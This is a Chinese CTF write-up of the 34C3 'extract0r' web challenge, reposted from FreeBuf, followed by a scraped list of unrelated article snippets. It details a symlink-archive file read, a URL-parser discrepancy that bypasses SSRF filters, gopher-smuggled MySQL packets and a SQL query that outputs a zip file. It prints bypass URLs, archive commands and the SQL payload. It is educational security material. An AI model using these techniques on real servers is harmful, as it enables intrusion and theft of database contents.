转载自FreeBuf平台
作者:undef1ned

前言

虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。

题目简介

34c3CTF web中的extract0r。

题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去

0x00 任意文件读取

经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,解压后的目录不解析php。通过上传一个含有符号链接文件的压缩包,可以达到任意文件读取的效果。

ln -s ../index.php test_link
7za a -t7z -r test.7z test

上传后访问test_link得到源代码

index.php (html部分已删去)

<?php
session_start();
url.php
function get_directory($new=false) {if (!isset($_SESSION["directory"]) || $new) {$_SESSION["directory"] = "files/" . sha1(random_bytes(100));}$directory = $_SESSION["directory"];if (!is_dir($directory)) {mkdir($directory);}return $directory;
}
function clear_directory() {$dir = get_directory();$files = glob($dir . '/*'); foreach($files as $file) { if(is_file($file) || is_link($file)) {unlink($file); } else if (is_dir($file)) {rmdir($file);}}
}
function verify_archive($path) {$res = shell_exec("7z l " . escapeshellarg($path) . " -slt");$line = strtok($res, "\n");$file_cnt = 0;$total_size = 0;while ($line !== false) {preg_match("/^Size = ([0-9]+)/", $line, $m);if ($m) {$file_cnt++;$total_size += (int)$m[1];}$line = strtok( "\n" );}if ($total_size === 0) {return "Archive's size 0 not supported";}if ($total_size > 1024*10) {return "Archive's total uncompressed size exceeds 10KB";}if ($file_cnt === 0) {return "Archive is empty";}if ($file_cnt > 5) {return "Archive contains more than 5 files";}return 0;
}
function verify_extracted($directory) {//遍历解压后的目录下的所有文件$files = glob($directory . '/*'); $cntr = 0;foreach($files as $file) {if (!is_file($file)) {//如果不是文件就删除$cntr++;unlink($file);@rmdir($file);}}return $cntr;
}
function decompress($s) {$directory = get_directory(true);$archive =  tempnam("/tmp/", "archive_");file_put_contents($archive, $s);$error = verify_archive($archive);if ($error) {unlink($archive);error($error);}shell_exec("7z e ". escapeshellarg($archive) . " -o" . escapeshellarg($directory) . " -y");unlink($archive);return verify_extracted($directory);
}
function error($s) {clear_directory();die("<h2><b>ERROR</b></h2> " . htmlspecialchars($s));
}
$msg = "";
if (isset($_GET["url"])) {$page =  get_contents($_GET["url"]);if (strlen($page) === 0) {error("0 bytes fetched. Looks like your file is empty.");} else {$deleted_dirs = decompress($page);$msg = "<h3>Done!</h3> Your files were extracted if you provided a valid archive.";if ($deleted_dirs > 0) {$msg .= "<h3>WARNING:</h3> we have deleted some folders from your archive for security reasons with our <a href='cyber_filter'>cyber-enabled filtering system</a>!";}}
}
?>

url.php

<?php
function in_cidr($cidr, $ip) {list($prefix, $mask) = explode("/", $cidr);return 0 === (((ip2long($ip) ^ ip2long($prefix)) >> (32-$mask)) << (32-$mask));
}
function get_port($url_parts) {if (array_key_exists("port", $url_parts)) {return $url_parts["port"];} else if (array_key_exists("scheme", $url_parts)) {return $url_parts["scheme"] === "https" ? 443 : 80;} else {return 80;}
}
function clean_parts($parts) {// oranges are not welcome here$blacklisted = "/[ \x08\x09\x0a\x0b\x0c\x0d\x0e:\d]/";if (array_key_exists("scheme", $parts)) {$parts["scheme"] = preg_replace($blacklisted, "", $parts["scheme"]);}if (array_key_exists("user", $parts)) {$parts["user"] = preg_replace($blacklisted, "", $parts["user"]);}if (array_key_exists("pass", $parts)) {$parts["pass"] = preg_replace($blacklisted, "", $parts["pass"]);}if (array_key_exists("host", $parts)) {$parts["host"] = preg_replace($blacklisted, "", $parts["host"]);}return $parts;
}
function rebuild_url($parts) {$url = "";$url .= $parts["scheme"] . "://";$url .= !empty($parts["user"]) ? $parts["user"] : "";$url .= !empty($parts["pass"]) ? ":" . $parts["pass"] : "";$url .= (!empty($parts["user"]) || !empty($parts["pass"])) ? "@" : "";$url .= $parts["host"];$url .= !empty($parts["port"]) ? ":" . (int) $parts["port"] : "";$url .= !empty($parts["path"]) ? "/" . substr($parts["path"], 1) : "";$url .= !empty($parts["query"]) ? "?" . $parts["query"] : "";$url .= !empty($parts["fragment"]) ? "#" . $parts["fragment"] : "";return $url;
}
function get_contents($url) {$disallowed_cidrs = [ "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8","10.0.0.0/8", "192.168.0.0/16", "14.0.0.0/8", "24.0.0.0/8", "172.16.0.0/12", "191.255.0.0/16", "192.0.0.0/24", "192.88.99.0/24","255.255.255.255/32", "240.0.0.0/4", "224.0.0.0/4", "203.0.113.0/24", "198.51.100.0/24", "198.18.0.0/15",  "192.0.2.0/24", "100.64.0.0/10" ];for ($i = 0; $i < 5; $i++) {$url_parts = clean_parts(parse_url($url));if (!$url_parts) {error("Couldn't parse your url!");}if (!array_key_exists("scheme", $url_parts)) {error("There was no scheme in your url!");}if (!array_key_exists("host", $url_parts)) {error("There was no host in your url!");}$port = get_port($url_parts);$host = $url_parts["host"];$ip = gethostbynamel($host)[0];if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4|FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)) {error("Couldn't resolve your host '{$host}' or the resolved ip '{$ip}' is blacklisted!");}foreach ($disallowed_cidrs as $cidr) {if (in_cidr($cidr, $ip)) {error("That IP is in a blacklisted range ({$cidr})!");}}// all good, rebuild url now$url = rebuild_url($url_parts);$curl = curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);curl_setopt($curl, CURLOPT_MAXREDIRS, 0);curl_setopt($curl, CURLOPT_TIMEOUT, 3);curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3);curl_setopt($curl,CURLOPT_SAFE_UPLOAD,0);curl_setopt($curl, CURLOPT_RESOLVE, array($host . ":" . $port . ":" . $ip)); //加一条缓存,防止dns rebindingcurl_setopt($curl, CURLOPT_PORT, $port);$data = curl_exec($curl);if (curl_error($curl)) {error(curl_error($curl));}$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);if ($status >= 301 and $status <= 308) {$url = curl_getinfo($curl, CURLINFO_REDIRECT_URL);} else {return $data;}}error("More than 5 redirects!");
}

简要分析代码流程

liucheng.png

经rebirth提醒,可以使用以.开头的文件来绕过verify_extracted中对链接目录的检测。ln -s / .a.a打包上传即可。这里是因为glob($dir . '/*');*遍历不到以.开头的文件。故绕过了对文件类型的检测,成功了链接到了根目录。

dir

翻一翻目录会发现:/home/extract0r/create_a_backup_of_my_supersecret_flag.shliucheng.png

这里创建了一个空密码的mysql用户,并且flag就在数据库中。之前已经有利用gopher协议攻击redis、fastcgi等的案例。我们可以试着利用gopher攻击一下mysql。这里有两个要点

  1. 绕过ip检查,实现ssrf
  2. 研究mysql协议,构造payload

0x01 SSRF

通过代码逻辑我们可知

url->php parse_url(过滤ip)->过滤url各部分(空白字符和数字)->curl发送请求

这里可利用parse_urllibcurl对url解析的差异来绕过。经过测试,得出以下结论(我本地环境php 7.0.20-2 libcurl/7.52.1

完整url: scheme:[//[user[:password]@]host[:port]][/path][?query][#fragment]
这里仅讨论url中不含'?'的情况
php parse_url:
host: 匹配最后一个@后面符合格式的host
libcurl:
host:匹配第一个@后面符合格式的host
如:
http://u:p@a.com:80@b.com/
php解析结果:schema: http host: b.comuser: upass: p@a.com:80
libcurl解析结果:schema: httphost: a.comuser: upass: pport: 80后面的@b.com/会被忽略掉

那么我们可以构造出一个域名,让php解析出来的host是a.com,dns解析后ip不在黑名单,这样就绕过了黑名单检查。而libcurl实际请求时候是另外一个域名,这样我们就可以实现任意ip请求了。

fuzz一下后得到以下结果
http://u:p:@a.com:3306@b.com/
http://u:@a.com:3306@b.com/
都可以实现php解析出来是b.com 而curl实际请求a.com:3306

但此题目中php解析url后在clean_parts中过滤了空白字符和数字,所以以上url均不可用。 

题目作者给出的url是:gopher://foo@[cafebabe.cf]@yolo.com:3306刚开始不太理解,后来@rebirth告诉我在rfc3986是这样定义url的:

A host identified by an Internet Protocol literal address, version 6 or later, is distinguished by enclosing the IP literal within square brackets ("[" and "]"). This is the only place where square bracket characters are allowed in the URI syntax.
IP-literal = "[" ( IPv6address / IPvFuture ) "]"
也就是说[ip]是一种host的形式,libcurl在解析时候认为[]包裹的是host

另外ricter大佬的gopher://foo@localhost:f@ricterz.me:3306/在题目环境中是可用的,我本地不可用(题目的libcurl版本比我本地高)

0x02 mysql协议分析

研究的目的是为了构造出gopher连接mysql的payload,mysql协议分为4.0之前和4.0之后两个版本,这里仅讨论4.0之后的协议,mysql交互过程:
mysql交互过程

MySQL数据库用户认证采用的是挑战/应答的方式,服务器生成该挑战数(scramble)并发送给客户端,客户端用挑战数加密密码后返回相应结果,然后服务器检查是否与预期的结果相同,从而完成用户认证的过程。 

登录时需要用服务器发来的scramble加密密码,但是当数据库用户密码为空时,加密后的密文也为空。client给server发的认证包就是相对固定的了。这样就无需交互,可以通过gopher协议来发送。 

mysql数据包前需要加一个四字节的包头。前三个字节代表包的长度,第四个字节代表包序,在一次完整的请求/响应交互过程中,用于保证消息顺序的正确,每次客户端发起请求时,序号值都会从0开始计算。

1. 握手初始化报文(服务器 -> 客户端)

mysql server

具体到抓包数据

4C0000//包大小76 小端字节序
00//序号0 
0A//版本号
352E372E31382D3100//版本信息字符串,以\0结尾,内容为5.7.18-1
04000000//服务器线程id
6B69457B3C342E43//scramble前半部分8字节
00//固定0x00
FFF7//服务器权能标志低16位 用于与客户端协商通讯方式
08//字符集,08代表utf-8
0200//服务器状态
FF81//服务器权能标志高16位
15//挑战串长度 
00000000000000000000//10字节0x00 固定填充
3A6A02314D2661447951577F00//scramble后半部分12字节 以null结尾
6D7973716C5F6E61746976655F70617373776F726400//密码加密方式,内容为mysql_native_password 对高版本来说没什么用 无视即可

2. 认证报文(客户端->服务器)

mysql_client_packet

当用户密码为空时,认证包唯一的变量挑战认证数据为0x00(NULL),所以认证包就是固定的了,不需要根据server发来的初始化包来计算了
这里顺带提一下密码的算法为

hash1 = SHA1(password) //password是用户输入的密码
result = hash1 ^ sha1(scramble+sha1(hash1))

3. 命令报文

命令报文相当简单

mysql_client_packet

第一个字节表示当前命令的类型,比如0x02(切换数据库),0x03(SQL查询)后面的参数就是要执行的sql语句了。

4. 验证

经过分析,执行一句sql语句时,发送了两个packet(认证packet、命令packet) ,那么我们把两个packet一起发给server端,server就会响应给我们结果。 packet的构造参见上文协议格式,需要注意的是mysql协议是小端字节序。 

这里我用socket做一个简单的测试,使用的是无密码用户,发送的sql语句是select now();

server_packet

那么在php下,使用libcurl请求也是一样的gopher_php

php的payload最后加了四个空字节,这是为了让server端解析第三个数据包时出错,断开与我们的连接。尽快返回数据,题目中curl的超时时间是3s

至此,我们完成了从gopher到sql执行。反观题目,这里需要curl得到的响应是可以被解压的。所以我们需要想办法把查出来的数据构造成压缩文件格式。

0x03 压缩文件格式

zip压缩算法压缩出来的文件一般包括四部分。

1.local file head
2.压缩后的Deflate数据
3.central directory file head
4.end of central directory record

zip格式

经过测试,7z是可以成功解压一个格式合法的压缩文件的,即使是文件CRC错误,部分字段异常。 

那么思路就来了,利用sql语句构造查询出zip的头和尾部,把我们想要的数据concat到中间的Deflate部分即可。(7z解压时候发现部分header异常,Deflate部分的数据会不经解压直接写入到解压后的文件) 

形如
select concat(zip_header,(the sql we want to execute), zip_eof)

针对zip具体的构造,不在赘述,参见zip算法详解 

这里我写了一个函数帮助我们创建

from struct import *
def create_zip(filename, content_size):content = '-'*content_sizefilename = pack('<%ds'%len(filename), filename)content_len_b = pack('<I', len(content))filename_len_b = pack('<H', len(filename))local_file_header = b"\x50\x4b\x03\x04\x0a\x00"+"\x00"*12local_file_header += content_len_b*2local_file_header += filename_len_blocal_file_header += "\x00\x00"local_file_header += filenamecd_file_header = b"\x50\x4b\x01\x02\x1e\x03\x0a\x00"+"\x00"*12+filename_len_b+"\x00"*16+filenamecd_file_header_len_b = pack("<I", len(cd_file_header))offset = pack("<I",len(local_file_header+cd_file_header))eof_record = b"\x50\x4b\x05\x06"+"\x00"*4+"\x01\x00"*2+cd_file_header_len_b+offset+"\x00\x00"#return each party of zipreturn [local_file_header,content,cd_file_header+eof_record]

需要注意的是,zip的Deflate部分是保存文件压缩后的内容,zip格式又要求必须给出Deflate部分的大小。这里我们只需把查出数据保存在Deflate部分,并且根据查询结果的预期大小来指定Deflate部分的尺寸。 

比如查询select version()时候Deflate大小20就够了。 这里给出一个sql大家可以自行测试

select concat(cast(0x504b03040a00000000000000000000000000e8030000e803000010000000746869735f69735f7468655f666c6167 as binary), rpad((select now()), 1000, '-'), cast(0x504b01021e030a00000000000000000000000000100000000000000000000000000000000000746869735f69735f7468655f666c6167504b0506000000000100010036000000640000000000 as binary)) into dumpfile '/tmp/test.zip';

这里的1000就是Deflate数据部分占用大小。 至此我们也就完成了sql语句的构造,可以通过sql查出一个压缩包格式的数据。并且解压后的文件内容就是查询结果。 

那么梳理一下,先是通过符号链接,得到了一个没有密码的数据库用户。又通过parse_urllibcurl的解析差异,绕过了对ip的合法性校验,从而可以实现ssrf任意ip。又通过分析mysql协议,发现空密码用户可以直接构造出packet执行sql语句。最终我们只需要输入gopher://foo@[cafebabe.cf]@yolo.com:3306/_+(发送给mysql的packet)+(四个空字节)就可以得到结果。

0x04 利用

为了方便,我写了一个简单的mysql client,测试与mysql 的通信并生成payload。

exploit

输入后:

result

有兴趣的可以连接自己的mysql,dump出packet

dump出packet

0x05 总结

这道题目融合了很多知识点,测试中还是学到不少东西。尤其是题目脚本中防dns rebindingb部分。感谢rebirth提供的帮助,和其讨论让我收益良多。

Reference:

  • https://blog.chaitin.cn/gopher-attack-surfaces/
  • http://hutaow.com/blog/2013/11/06/mysql-protocol-analysis/#1
  • https://dev.mysql.com/doc/dev/mysql-server/latest/page_protocol_connection_phase.html
  • https://en.wikipedia.org/wiki/Gopher_(protocol

本文作者:南阳理工学院网络与信息安全研究所@undefined,转载请注明

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. 网站PWA升级

    渐进式网络应用 ( Progressive Web Apps ),即我们所熟知的 PWA,是 Google 提出的用前沿的 Web 技术为网页提供 App 般使用体验的一系列方案。PWA 本质上是 Web App,借助一些新技术也具备了 Native App 的一些特性。本文将详细介绍针对现有网站的PWA升级效果演示【添加到桌面…...

    2024/4/23 7:38:09
  2. 三、dubbo源码分析-服务发布与注册

    一、概括 ​ Dubbo 服务发布始于 Spring 容器Refresh刷新事件,接收到事件后,执行服务发布逻辑。整个逻辑大致可分为三个部分: ​ 第一部分是前置工作,主要用于检查参数,组装 URL。 ​ 第二部分是导出服务,包含导出服务到本地 (JVM),和导出服务到远程两个过程。 ​ …...

    2024/5/4 14:24:04
  3. Linux指令——计划任务、日志管理

    Linux指令——计划任务、日志管理计划任务一次性调度执行 at循环调度执行 cron日志管理日志进程日志轮转主配置文件子配置文件夹设置日志轮转 计划任务 一次性调度执行 at 语法:at {timespec}命令 描述atq 查询计划任务Ctrl+d 退出at循环调度执行 cron命令 描述crontab -e 创建…...

    2024/4/20 15:45:41
  4. 纯手写理解设计模式代码之建造者模式

    建造者模式同属于创建型模式 package com.demo.build;/*** 建造者模式* 属于创建型模式* 建造者模式与工厂模式相似,也是用来创建对象* 建造者模式关键点在于建造和装配分离,* 建造者最终只会生成一个完整的对象,对象里面会分成好几个模块,建造者模式强调的是这个装配的过程…...

    2024/4/18 17:59:57
  5. 剑指 Offer-JZ41-和为S的连续正数序列

    题目描述 小明很喜欢数学,有一天他在做数学作业时,要求计算出9~16的和,他马上就写出了正确答案是100。但是他并不满足于此,他在想究竟有多少种连续的正数序列的和为100(至少包括两个数)。没多久,他就得到另一组连续正数和为100的序列:18,19,20,21,22。现在把问题交给你,你能不能…...

    2024/5/3 21:06:11
  6. Flink指标监控

    Flink指标监控...

    2024/5/1 23:13:50
  7. 中国大学慕课刷课软件刷课脚本插件刷课时mooc刷课软件

    中国大学慕课刷课软件、中国大学慕课刷课插件、中国大学慕课刷课脚本中国大学慕课mooc刷课软件、中国大学慕课刷课答案查询、中国大学慕课刷网课下载地址:https://afeixz.lanzous.com/b01hhp7mf主要功能:自动观看视频、课件、讨论、在线作业、测试题库、考试题库、SCOP课程希…...

    2024/4/28 13:35:55
  8. XSS编码 浏览器解析顺序

    0x00 引言很多不了解html、js编码的童鞋挖掘xss漏洞时,都是一顿乱插,姿势对了,就能获得快感,姿势不对,就么反应。本文介绍常见的编码方法,能力不足,如有其他意见,请指正。0x01 常用编码URL编码:一个百分号和该字符的ASCII编码所对应的2位十六进制数字,例如“/”的URL…...

    2024/4/26 5:29:51
  9. 基于JavaWeb的计算机网络在线测评系统(源码+数据库+论文)

    本系统基于B/S结构的模式开发,通过网络给广大用户提供了比较可靠、方便、快捷的在线测评平台,系统主要实现了自动抽取试题、人工出题、套题选择、自动阅卷计分、在线测试、用户信息管理、成绩存档、错题管理等功能。用户利用浏览器可以直接访问本平台,通过选择要考的套题进行…...

    2024/5/3 16:02:15
  10. servlet容器的概述(Tomcat)

    servlet容器的基本概念 1. Tomcat是Servlet的运行环境,即一个Servlet容器。 2. Servlet容器的作用是负责处理客户请求,当客户请求来到时,Servlet容器获取请求,然后调用某个Servlet,并把Servlet的执行结果返回给客户。 3. Servlet容器的工作过程是:当客户请求某个资源时,…...

    2024/4/8 23:52:45
  11. 【Practical】JavaSocket编程开发聊天室Ⅰ

    1.实验要求.用Java图形用户界面编写聊天室服务器端和客户端, 支持多个客户端连接到一个服务器。每个客户端能够输入账号。 可以实现群聊(聊天记录显示在所有客户端界面)。 完成好友列表在各个客户端上显示。 可以实现私人聊天,用户可以选择某个其他用户,单独发送信息。 服…...

    2024/4/21 17:00:10
  12. Vue开发指南之深入了解组件

    前言 这篇文章是上一篇文章的续文,让我们一起了解组件吧。 组件注册 全局组件与局部组件 组件名称首字母大写命名(MyComponentName)或者短横线分隔命名(my-component-name) 全局组件: Vue.component(my-component-name, { /* ... */ })局部组件 注意一点:局部注册的组件…...

    2024/5/3 13:07:49
  13. OSPF大体框架

    1.防环机制:域内传递拓扑结构,使用算法形成路由表,只能存在一个骨干区域且域间进行水平分割 2.区域划分的原因:ospf算法较为复杂,若不进行区域划分,会大量的浪费资源 3.建邻过程: Down: Init:初始化状态,已经发送了hello报文,准备建立邻居关系 attempt :尝试建立邻…...

    2024/5/3 14:38:05
  14. iOS 涨薪: Run Loop 面试题

    Run Loop运行循环### app 程序只有不停地运行, 才能不断响应用户的操作Run Loop 两大功能:------------------* 睡眠中,等待消息* 处理消息从睡眠中 -> 处理消息, 需要一个唤醒的过程* * *1、 讲讲 RunLoop, 项目中有用到吗?RunLoop 的基本作用:保持程序的持续运行节…...

    2024/4/8 23:52:41
  15. CSS中设置背景透明而其上的文字不透明

    写关于透明度的样式时,一直习惯于使用opacity属性,最近发现这个属性不仅影响到当前元素,其下的所有子元素透明度都会被改变,不是想要的效果。 查了很久,才发现可以通过rgb方法设置自带透明度的背景颜色,这样一来,就不用担心修改透明度会影响到子元素中的内容了。 代码如…...

    2024/5/1 10:19:41
  16. vue的递归组件以及三级菜单的制作

    js里面有递归算法,同时,我们也可以利用props来实现vue模板的递归调用,但是前提是组件拥有 name 属性 父组件:slotDemo.vue:<template><div><!-----递归组件-----><ul><simple3 :tree="item" v-for="item in tree"></s…...

    2024/4/22 10:23:09
  17. Flink消息乱序

    Flink消息乱序...

    2024/4/25 10:22:41
  18. 多线程的创建和使用

    线程的创建和使用 Java语言的JVM允许程序运行多个线程,它通过java.lang.Thread 类来体现。 API中创建线程的两种方式之一(继承Thread类 )每个线程都是通过某个特定Thread对象的run()方法来完成操作的,经常 把run()方法的主体称为线程体 通过该Thread对象的start()方法来启动…...

    2024/4/23 2:46:37
  19. 使用动态SQL中的if标签做条件判断的几种用法和注意点

    使用中踩到的坑记录一下(大神请略过,我只是个菜菜,忽喷!!!万分感谢!!!) <mapper namespace="dynamic"><resultMap id="userMap" type="com.soft.test.model.User"><id column="id" property="id"/><re…...

    2024/5/3 8:05:46
  20. Filecoin的头矿值不值得投资

    直到前两天,Filecoin官方奖励测试再一次宣布延迟两周上线之后,网络上针对Filecoin的讨论热潮达到了顶峰。目前Filecoin的微信热搜指数已经超越比特币,火爆程度可见一斑。但是讨论归讨论,真要拿着真金白银下场投资,还是需要仔细权衡一番的,毕竟谁的钱都不是大风刮来的。那…...

    2024/4/23 4:11:09

最新文章

  1. 数据安全全场景覆盖

    随着万物互联时代的到来&#xff0c;海量物联网设备产生的庞大数据逐渐超出云端服务器的处理能力&#xff0c;同时算力向边缘侧不断迁移&#xff0c;边缘计算逐渐成为云计算的重要延伸和补充。根据《中国边缘计算服务器市场报告》、《中国边缘云计算行业展望报告》等预测&#…...

    2024/5/4 19:31:05
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. Flink中几个关键问题总结

    硬核&#xff01;八张图搞懂 Flink 端到端精准一次处理语义 Exactly-once&#xff08;深入原理&#xff0c;建议收藏&#xff09; Flink可靠性的基石-checkpoint机制详细解析 硬核&#xff01;一文学完Flink流计算常用算子&#xff08;Flink算子大全&#xff09;...

    2024/5/2 21:34:39
  4. 腾讯云CVM S5云服务器4核8G多少钱一年?

    腾讯云CVM S5云服务器4核8G多少钱一年&#xff1f;1437.24元15个月&#xff08;买1年送3个月&#xff09;&#xff0c;配置&#xff1a;云服务器CVM S5、4核8G、1M/3M/5M带宽可选、不限制流量、上海、50G 通用型SSD云硬盘。 腾讯云服务器有两个活动&#xff0c;一个是官方的主…...

    2024/5/3 2:02:16
  5. 416. 分割等和子集问题(动态规划)

    题目 题解 class Solution:def canPartition(self, nums: List[int]) -> bool:# badcaseif not nums:return True# 不能被2整除if sum(nums) % 2 ! 0:return False# 状态定义&#xff1a;dp[i][j]表示当背包容量为j&#xff0c;用前i个物品是否正好可以将背包填满&#xff…...

    2024/5/4 12:05:22
  6. 【Java】ExcelWriter自适应宽度工具类(支持中文)

    工具类 import org.apache.poi.ss.usermodel.Cell; import org.apache.poi.ss.usermodel.CellType; import org.apache.poi.ss.usermodel.Row; import org.apache.poi.ss.usermodel.Sheet;/*** Excel工具类** author xiaoming* date 2023/11/17 10:40*/ public class ExcelUti…...

    2024/5/4 11:23:32
  7. Spring cloud负载均衡@LoadBalanced LoadBalancerClient

    LoadBalance vs Ribbon 由于Spring cloud2020之后移除了Ribbon&#xff0c;直接使用Spring Cloud LoadBalancer作为客户端负载均衡组件&#xff0c;我们讨论Spring负载均衡以Spring Cloud2020之后版本为主&#xff0c;学习Spring Cloud LoadBalance&#xff0c;暂不讨论Ribbon…...

    2024/5/4 14:46:16
  8. TSINGSEE青犀AI智能分析+视频监控工业园区周界安全防范方案

    一、背景需求分析 在工业产业园、化工园或生产制造园区中&#xff0c;周界防范意义重大&#xff0c;对园区的安全起到重要的作用。常规的安防方式是采用人员巡查&#xff0c;人力投入成本大而且效率低。周界一旦被破坏或入侵&#xff0c;会影响园区人员和资产安全&#xff0c;…...

    2024/5/3 16:00:51
  9. VB.net WebBrowser网页元素抓取分析方法

    在用WebBrowser编程实现网页操作自动化时&#xff0c;常要分析网页Html&#xff0c;例如网页在加载数据时&#xff0c;常会显示“系统处理中&#xff0c;请稍候..”&#xff0c;我们需要在数据加载完成后才能继续下一步操作&#xff0c;如何抓取这个信息的网页html元素变化&…...

    2024/5/4 12:10:13
  10. 【Objective-C】Objective-C汇总

    方法定义 参考&#xff1a;https://www.yiibai.com/objective_c/objective_c_functions.html Objective-C编程语言中方法定义的一般形式如下 - (return_type) method_name:( argumentType1 )argumentName1 joiningArgument2:( argumentType2 )argumentName2 ... joiningArgu…...

    2024/5/3 21:22:01
  11. 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】

    &#x1f468;‍&#x1f4bb;博客主页&#xff1a;花无缺 欢迎 点赞&#x1f44d; 收藏⭐ 留言&#x1f4dd; 加关注✅! 本文由 花无缺 原创 收录于专栏 【洛谷算法题】 文章目录 【洛谷算法题】P5713-洛谷团队系统【入门2分支结构】&#x1f30f;题目描述&#x1f30f;输入格…...

    2024/5/3 23:17:01
  12. 【ES6.0】- 扩展运算符(...)

    【ES6.0】- 扩展运算符... 文章目录 【ES6.0】- 扩展运算符...一、概述二、拷贝数组对象三、合并操作四、参数传递五、数组去重六、字符串转字符数组七、NodeList转数组八、解构变量九、打印日志十、总结 一、概述 **扩展运算符(...)**允许一个表达式在期望多个参数&#xff0…...

    2024/5/4 14:46:12
  13. 摩根看好的前智能硬件头部品牌双11交易数据极度异常!——是模式创新还是饮鸩止渴?

    文 | 螳螂观察 作者 | 李燃 双11狂欢已落下帷幕&#xff0c;各大品牌纷纷晒出优异的成绩单&#xff0c;摩根士丹利投资的智能硬件头部品牌凯迪仕也不例外。然而有爆料称&#xff0c;在自媒体平台发布霸榜各大榜单喜讯的凯迪仕智能锁&#xff0c;多个平台数据都表现出极度异常…...

    2024/5/4 14:46:11
  14. Go语言常用命令详解(二)

    文章目录 前言常用命令go bug示例参数说明 go doc示例参数说明 go env示例 go fix示例 go fmt示例 go generate示例 总结写在最后 前言 接着上一篇继续介绍Go语言的常用命令 常用命令 以下是一些常用的Go命令&#xff0c;这些命令可以帮助您在Go开发中进行编译、测试、运行和…...

    2024/5/4 14:46:11
  15. 用欧拉路径判断图同构推出reverse合法性:1116T4

    http://cplusoj.com/d/senior/p/SS231116D 假设我们要把 a a a 变成 b b b&#xff0c;我们在 a i a_i ai​ 和 a i 1 a_{i1} ai1​ 之间连边&#xff0c; b b b 同理&#xff0c;则 a a a 能变成 b b b 的充要条件是两图 A , B A,B A,B 同构。 必要性显然&#xff0…...

    2024/5/4 2:14:16
  16. 【NGINX--1】基础知识

    1、在 Debian/Ubuntu 上安装 NGINX 在 Debian 或 Ubuntu 机器上安装 NGINX 开源版。 更新已配置源的软件包信息&#xff0c;并安装一些有助于配置官方 NGINX 软件包仓库的软件包&#xff1a; apt-get update apt install -y curl gnupg2 ca-certificates lsb-release debian-…...

    2024/5/3 16:23:03
  17. Hive默认分割符、存储格式与数据压缩

    目录 1、Hive默认分割符2、Hive存储格式3、Hive数据压缩 1、Hive默认分割符 Hive创建表时指定的行受限&#xff08;ROW FORMAT&#xff09;配置标准HQL为&#xff1a; ... ROW FORMAT DELIMITED FIELDS TERMINATED BY \u0001 COLLECTION ITEMS TERMINATED BY , MAP KEYS TERMI…...

    2024/5/4 12:39:12
  18. 【论文阅读】MAG:一种用于航天器遥测数据中有效异常检测的新方法

    文章目录 摘要1 引言2 问题描述3 拟议框架4 所提出方法的细节A.数据预处理B.变量相关分析C.MAG模型D.异常分数 5 实验A.数据集和性能指标B.实验设置与平台C.结果和比较 6 结论 摘要 异常检测是保证航天器稳定性的关键。在航天器运行过程中&#xff0c;传感器和控制器产生大量周…...

    2024/5/4 13:16:06
  19. --max-old-space-size=8192报错

    vue项目运行时&#xff0c;如果经常运行慢&#xff0c;崩溃停止服务&#xff0c;报如下错误 FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory 因为在 Node 中&#xff0c;通过JavaScript使用内存时只能使用部分内存&#xff08;64位系统&…...

    2024/5/4 16:48:41
  20. 基于深度学习的恶意软件检测

    恶意软件是指恶意软件犯罪者用来感染个人计算机或整个组织的网络的软件。 它利用目标系统漏洞&#xff0c;例如可以被劫持的合法软件&#xff08;例如浏览器或 Web 应用程序插件&#xff09;中的错误。 恶意软件渗透可能会造成灾难性的后果&#xff0c;包括数据被盗、勒索或网…...

    2024/5/4 14:46:05
  21. JS原型对象prototype

    让我简单的为大家介绍一下原型对象prototype吧&#xff01; 使用原型实现方法共享 1.构造函数通过原型分配的函数是所有对象所 共享的。 2.JavaScript 规定&#xff0c;每一个构造函数都有一个 prototype 属性&#xff0c;指向另一个对象&#xff0c;所以我们也称为原型对象…...

    2024/5/4 2:00:16
  22. C++中只能有一个实例的单例类

    C中只能有一个实例的单例类 前面讨论的 President 类很不错&#xff0c;但存在一个缺陷&#xff1a;无法禁止通过实例化多个对象来创建多名总统&#xff1a; President One, Two, Three; 由于复制构造函数是私有的&#xff0c;其中每个对象都是不可复制的&#xff0c;但您的目…...

    2024/5/3 22:03:11
  23. python django 小程序图书借阅源码

    开发工具&#xff1a; PyCharm&#xff0c;mysql5.7&#xff0c;微信开发者工具 技术说明&#xff1a; python django html 小程序 功能介绍&#xff1a; 用户端&#xff1a; 登录注册&#xff08;含授权登录&#xff09; 首页显示搜索图书&#xff0c;轮播图&#xff0…...

    2024/5/4 9:07:39
  24. 电子学会C/C++编程等级考试2022年03月(一级)真题解析

    C/C++等级考试(1~8级)全部真题・点这里 第1题:双精度浮点数的输入输出 输入一个双精度浮点数,保留8位小数,输出这个浮点数。 时间限制:1000 内存限制:65536输入 只有一行,一个双精度浮点数。输出 一行,保留8位小数的浮点数。样例输入 3.1415926535798932样例输出 3.1…...

    2024/5/4 14:46:02
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

